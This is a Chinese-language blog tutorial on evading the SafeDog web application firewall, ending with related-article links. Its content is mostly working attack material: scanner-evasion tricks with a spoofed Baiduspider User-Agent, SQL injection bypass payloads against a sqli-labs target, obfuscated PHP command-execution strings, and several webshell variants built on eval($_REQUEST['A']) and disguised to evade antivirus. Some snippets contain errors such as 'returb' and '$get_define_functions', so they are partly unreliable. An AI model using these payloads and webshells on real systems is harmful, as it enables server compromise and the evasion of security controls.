waf绕过:网络安全狗绕过

引言:

所有的绕过原理都大致一致,但是并不是所有的绕过都能起到作用,渗透测试主要还是一个猜加试的过程,本文仅供参考

网络攻击或扫描绕过

1.get绕过(未开启cc防护)

网络安全狗的默认防护为,拒绝head请求,在扫描工具中大部分使用head请求去收集目录信息,所以改用get请求绕过

2.cc防护绕过

cc防护:和检测流量攻击的原理相同,同一ip并发数过多对其进行禁用
1)延迟绕过:限制扫描速率
2)爬虫引擎:更换User-Agent头
sql 复制代码
Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html) 
Mozilla/5.0 (compatible; Baiduspider-render/2.0; +http://www.baidu.com/search/spider.html)

sql注入绕过

sql内联注释绕过:针对MySQL

mysql为了兼容其他数据,将mysql的特有语句放入/*!100441 */,其他数据库不执行,但在mysql中正常执行

sql 复制代码
//被拦截
http://192.168.10.111/sqli-labs/Less-1/?id=2 and 1=1
//成功注入
http://192.168.10.111/sqli-labs/Less-1/?id=2' /*!10441and*/ 1=2 --+

特殊符号绕过:

%0a:为换行 %23:为#

sql 复制代码
192.168.10.111/sqli-labs/Less-1/?id=2' --+/*%0a and 1=2 union select 1,2,3%23*/
sql 复制代码
-- 最后展现在sql中的语句为
--+/*
and 1=2 union select 1,2,3 #*/

HPP参数污染:针对apache

因为apach接收数据时允许同名数据,并且最后一个数据为有效值,所以只有第最后一个参数后的语句有效

sql 复制代码
192.168.10.111/sqli-labs/Less-1/?id=2' /*&id=2' and 1=2 union select 1,database(),3 %23*/

RCE绕过

变量拼接绕过

waf对某些特殊字符串进行检测时可以使用

php 复制代码
//如果对phpinfo检测,可以把参数改为
$a='php';$b='info';$c=$a.$b;$c();

编码绕过

php 复制代码
assert(base64_decode('cGhwaW5mbygpOw=='));

字符替换绕过

php 复制代码
assert(str_replace('x','','sxyxsxtxexm("ipconfig")'));

传参绕过

php 复制代码
url:rce_eval.php?str=tem
$b=sys;$c=$_GET['str'];$a=$b.$c;$a('ipconfig');

后渗透绕过(木马免杀)

waf中eval和$_REQUEST同时出现时会被拦截

end免杀

end函数取数组最后一个元素

php 复制代码
eval(end($_REQUEST['A']));

define免杀

php 复制代码
define("b","$_REQUEST['A']");
eval(b);

拼接免杀

php 复制代码
$a='ev';
$b='al';
$c=$a.$b;
$d='c';
$$d($_REQUEST['A']);
//等价于eval($_REQUEST['A']);

函数免杀

php 复制代码
function abc($b){
    returb $b;
}
$a = abc("$_REQUEST['A']");
eval($a);

类定义绕过

php 复制代码
class user{
    $name='';
    function __construct($name){
        $this->name=$name;
    }
    function __destruct(){
        eval($this->name);
    }
}
$a=new user($_REQUEST['A']);

cookie绕过

php 复制代码
$cookie = $_COOKIE;
foreach($cookie as $key => $value){
    if($key=='eval'){
        $key($_REQUEST['A']);
    }
}

预定义函数绕过

php 复制代码
$defun = $get_define_functions();
//使用defun获取assert
$defun['internal'][841]($_REQUEST['A']);

编码绕过

php 复制代码
eval(base64_decode('JF9SRVFVRVNUWydBJ10='));

并不是所有方式都是有用

对于pc防火墙免杀如 火绒、360,也可以使用相同的思路

对于火绒免杀,有效的方法

相关推荐
Chockmans2 小时前
春秋云境CVE-2021-42897(保姆级教学)
计算机网络·安全·web安全·网络安全·安全威胁分析·春秋云境·cve-2021-42897
风控PM说5 小时前
入门第二课:业务催生风险,常见的业务风险有哪些?
安全
四月天4316 小时前
web安全-SSTI(服务器模板注入)
笔记·学习·web安全·网络安全
独守一片天20 小时前
HarmonyOS 6.1.0 Call Service 来电识别与安全通信怎么设计?
安全·华为·harmonyos
想你依然心痛1 天前
嵌入式C代码规范:MISRA-C 2012核心规则解读——类型安全与未定义行为深度剖析
c语言·安全·代码规范
Elastic 中国社区官方博客1 天前
跟踪资金流向:使用 ES|QL 和跨集群搜索追踪洗钱网络
大数据·人工智能·安全·elasticsearch·搜索引擎·金融·全文检索
IT新视界1 天前
数据要素安全流通服务
安全
微信开发api-视频号协议1 天前
Codex++安全边界探秘:从模型能力到风险防御
前端·安全·微信·企业微信
枝头玉1 天前
新160个CrackMe048-monkeycrackme1、049-THraw-crackme8、050-daxxor逆向分析
安全·逆向·crackme·reserve
维基框架1 天前
Claude Mythos Preview 发布后严重漏洞激增:安全还是营销?
人工智能·安全